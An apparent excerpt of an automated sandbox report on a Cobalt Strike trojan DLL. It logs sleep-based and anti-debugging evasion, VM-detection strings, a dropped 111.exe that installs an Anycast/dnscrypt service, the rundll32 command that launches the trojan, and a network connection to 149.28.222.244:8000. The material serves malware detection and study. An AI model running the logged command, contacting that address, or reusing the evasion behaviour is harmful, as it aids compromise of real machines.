        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31431s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44939s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30554s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30983s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36361s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36278s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37816s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33901s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40188s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37516s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44770s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33550s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33834s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30150s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36036s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43501s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31513s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30907s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40682s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37199s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35575s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38419s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38614s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35849s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33903s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35125s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39892s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37083s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37906s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40737s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35905s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34198s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30091s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32675s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38149s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42759s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42931s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33940s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42646s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38488s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40690s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42383s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32057s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30426s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35443s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34575s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43691s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33877s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39366s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32473s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43199s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36009s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40094s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33242s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36111s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33623s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40432s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33368s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43362s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43728s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35770s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44264s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35308s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37375s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34056s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43774s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36605s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41362s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37122s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34285s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37635s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37807s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36757s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -35837s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41912s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43644s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32491s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39114s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32134s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40836s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36628s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31873s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39873s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31159s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31956s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33704s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34004s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39025s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37428s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43276s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40863s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34742s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -42224s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30504s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41847s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41706s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39367s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30752s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -41185s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36133s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30666s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38673s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -39635s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36819s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38235s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37363s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40035s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -33605s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -34509s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -40412s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -32783s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -37050s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -43521s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -44255s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -31256s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -30925s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -38565s >= -30000sJump to behavior
        Source: C:\Windows\System32\rundll32.exe TID: 5456Thread sleep time: -36865s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\Public\111.exeFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
        Source: C:\Users\Public\111.exeFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
        Source: C:\Users\Public\111.exeFile Volume queried: C:\Program Files (x86)\Anycast FullSizeInformation
        Source: C:\Users\Public\111.exeFile Volume queried: C:\Program Files (x86)\Anycast FullSizeInformation
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B805A9D8 FindFirstFileExW,0_2_00007FF8B805A9D8
        Source: C:\Users\Public\111.exeCode function: 6_2_0040676F FindFirstFileW,FindClose,6_2_0040676F
        Source: C:\Users\Public\111.exeCode function: 6_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405B23
        Source: C:\Users\Public\111.exeCode function: 6_2_00402902 FindFirstFileW,6_2_00402902
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8028AC8 FindFirstFileExW,34_2_00007FF8B8028AC8
        Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 100000
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99871
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99750
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99640
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99531
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99421
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99312
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99202
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99093
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98984
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98871
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98750
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98598
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99856
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99752
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99619
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99510
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99405
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99286
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99170
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 99057
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98956
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98826
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98723
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98588
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98485
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98350
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98249
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98144
        Source: C:\Program Files (x86)\Anycast\Anycast.exeThread delayed: delay time: 98016
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
        Source: rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
        Source: rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
        Source: rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C358000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Anycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEMutating a value collection derived from a dictionary is not allowed.
        Source: Anycast.exe, 0000002B.00000002.4461217800.0000000006BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
        Source: anycast-service.exe, 00000026.00000003.2302912801.000001FE0731F000.00000004.00000020.00020000.00000000.sdmp, anycast-service.exe, 00000026.00000003.2303273321.000001FE07322000.00000004.00000020.00020000.00000000.sdmp, anycast-service.exe, 00000026.00000003.2301918616.000001FE0731E000.00000004.00000020.00020000.00000000.sdmp, anycast-service.exe, 00000026.00000003.2301997092.000001FE0731E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
        Source: dnscrypt-proxy.exe, 00000027.00000002.2169990310.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000028.00000002.2178518225.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4453155305.0000000001577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\Public\111.exeAPI call chain: ExitProcess graph end nodegraph_6-3469
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8058500 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF8B8058500
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8051A00 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,FreeLibrary,WriteFile,CloseHandle,FreeLibrary,0_2_00007FF8B8051A00
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B805C528 GetProcessHeap,0_2_00007FF8B805C528
        Source: C:\Program Files (x86)\Anycast\Anycast.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8058500 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF8B8058500
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8052570 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF8B8052570
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8052C64 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF8B8052C64
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B801DDC4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF8B801DDC4
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8016A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF8B8016A00
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8016E9C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF8B8016E9C
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8F8F33C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF8B8F8F33C
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 149.28.222.244 8000Jump to behavior
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8012370 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid,SetLastError,GetCurrentProcessId,GetCurrentProcessId,GetModuleFileNameA,GetFileAttributesA,SetLastError,ShellExecuteExA,GetLastError,SetLastError,CloseHandle,CreateFileA,GetLastError,Sleep,SetLastError,34_2_00007FF8B8012370
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1Jump to behavior
        Source: C:\Users\Public\111.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd" Jump to behavior
        Source: C:\Users\Public\111.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe stop
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe uninstall
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe install
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe dnscrypt\dnscrypt-proxy.exe -service install
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe dnscrypt\dnscrypt-proxy.exe -service start
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8012370 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid,SetLastError,GetCurrentProcessId,GetCurrentProcessId,GetModuleFileNameA,GetFileAttributesA,SetLastError,ShellExecuteExA,GetLastError,SetLastError,CloseHandle,CreateFileA,GetLastError,Sleep,SetLastError,34_2_00007FF8B8012370
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmpBinary or memory string: Shell_TrayWnd
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8060F30 cpuid 0_2_00007FF8B8060F30
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\111.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeQueries volume information: C:\Program Files (x86)\Anycast\dnscrypt\public-resolvers.md VolumeInformation
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeQueries volume information: C:\Program Files (x86)\Anycast\dnscrypt\relays.md VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\Anycast.exe VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\Sentry.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.RuntimeInformation\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\Microsoft.Bcl.AsyncInterfaces.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Threading.Tasks.Extensions.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Reflection.Metadata.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Collections.Immutable.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Memory.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Text.Json.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Text.Encodings.Web.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Buffers.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\Hardcodet.NotifyIcon.Wpf.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\Newtonsoft.Json.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Program Files (x86)\Anycast\System.Net.Http.Formatting.dll VolumeInformation
